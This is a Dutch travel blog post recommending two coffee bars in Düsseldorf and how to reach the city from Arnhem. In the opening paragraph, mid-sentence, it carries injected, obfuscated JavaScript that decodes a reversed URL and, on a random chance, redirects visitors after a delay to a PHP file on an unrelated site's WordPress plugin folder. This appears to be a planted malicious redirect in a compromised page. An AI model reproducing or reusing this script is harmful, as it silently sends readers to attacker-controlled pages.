tomehein.nl/xmlrpc.php" /> 2x Koffiebars in Düsseldorf - Op reis met ome Hein tomehein.nl/wp-includes/wlwmanifest.xml" />
dusseldorf koffiebar museum koffie cappuccino

Duitse koffie, een succes?

Toegeven, Duitsland staat niet bepaald bekend vanwege de $NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tomehein.nl/vijf-plekken-europa-koffie-thee-moet-gedronken/”>koffie waren we dan ook een tikkeltje huiverig toen we voor een korte stedentrip afreisden naar Düsseldorf. Onze slechte verwachtingen kwamen echter niet geheel uit. Vandaar dat we deze twee adresjes met jullie willen delen ;).

Koffiebar 1: Bazzar Caffè

Kaffee bedeutet Lebensqualität, ist Treibstoff für den Geist und Balsam für die Seele” valt te lezen op de website van Bazzar Caffè. Niet gek dus dat koffie er heel serieus wordt genomen. Deze koffiezaak ligt op de route van het Hauptbahnhof naar de oude stad, in het chique winkelgedeelte van Dusseldorf. Het is er altijd druk, maar gezellig. Naast heerlijke koffie drinken, is er ook genoeg om naar te kijken: de hele wand is gedecoreerd met oude koffiemolens.

Adres: Heinrich-Heine-Allee 53. De ingang valt nauwelijks op, dus kijk goed. Aan de achterkant bevindt zich een (overdekt) terras.

Koffiebar 2: Rösterei VIER

Tegenover het Rathaus zit Rösterei VIER, een miniscuul café waar koffie prioriteit nummer 1 is. Naast heerlijke cappuccino of latte macchiato kan je hier ook genieten van versgezette filterkoffie. Bij regen kun je binnenzitten, bij mooi weer op het terras aan de Marktplatz.

Ook naar Düsseldorf?

Wil je ook naar Düsseldorf? Arnhem heeft tegenwoordig een directe verbinding met deze Duitse stad, die vooral bekend is vanwege de Kerstmarkten. Kost maar 15 euro en je bent er binnen twee uur. Meer informatie vind je op de website van de vervoersmaatschappij Abellio.

Geef een reactie

Het e-mailadres wordt niet gepubliceerd. Verplichte velden zijn gemarkeerd met *

Goto Top